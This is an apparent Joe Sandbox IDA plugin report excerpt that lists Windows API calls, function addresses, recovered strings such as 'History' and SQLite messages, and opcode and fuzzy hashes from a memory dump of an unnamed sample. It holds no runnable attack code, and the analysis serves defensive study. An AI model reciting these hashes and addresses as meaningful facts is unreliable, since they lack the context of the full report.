                                                                                                                                                                                                                              • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                                                                                                                              • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                                                              • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                                                              • free.MSVCRT ref: 004174E4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4053608372-0
                                                                                                                                                                                                                              • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                                                                                              • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4247780290-0
                                                                                                                                                                                                                              • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                              • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                                • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1471605966-0
                                                                                                                                                                                                                              • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                                                              • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                                                              • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                                                              • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                                                              • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                                                • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                                                                                                                                • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                                              • String ID: \StringFileInfo\
                                                                                                                                                                                                                              • API String ID: 102104167-2245444037
                                                                                                                                                                                                                              • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                                                              • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ??3@
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                                                                                                              • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                              • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _memicmpwcslen
                                                                                                                                                                                                                              • String ID: @@@@$History
                                                                                                                                                                                                                              • API String ID: 1872909662-685208920
                                                                                                                                                                                                                              • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                                                              • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00410112
                                                                                                                                                                                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                                              • String ID: </%s>
                                                                                                                                                                                                                              • API String ID: 3400436232-259020660
                                                                                                                                                                                                                              • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                                              • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                                                              • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                                                              • String ID: caption
                                                                                                                                                                                                                              • API String ID: 1523050162-4135340389
                                                                                                                                                                                                                              • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                                                              • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                                                                • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                                                              • String ID: MS Sans Serif
                                                                                                                                                                                                                              • API String ID: 210187428-168460110
                                                                                                                                                                                                                              • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                                              • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                                                              • String ID: edit
                                                                                                                                                                                                                              • API String ID: 2747424523-2167791130
                                                                                                                                                                                                                              • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                                                              • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                              • API String ID: 3150196962-1506664499
                                                                                                                                                                                                                              • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                                                                                                                              • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                                                                                              • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                                                                                                                                              • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy$memcmp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3384217055-0
                                                                                                                                                                                                                              • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                              • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$memcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 368790112-0
                                                                                                                                                                                                                              • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                                                              • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                                                                • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                                                                • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                                                              • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                                                              • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                                                              • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                                                              • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1889144086-0
                                                                                                                                                                                                                              • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                              • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1661045500-0
                                                                                                                                                                                                                              • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                              • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                                                              • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                                                              • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpymemset
                                                                                                                                                                                                                              • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                              • API String ID: 1297977491-2063813899
                                                                                                                                                                                                                              • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                              • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                                • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
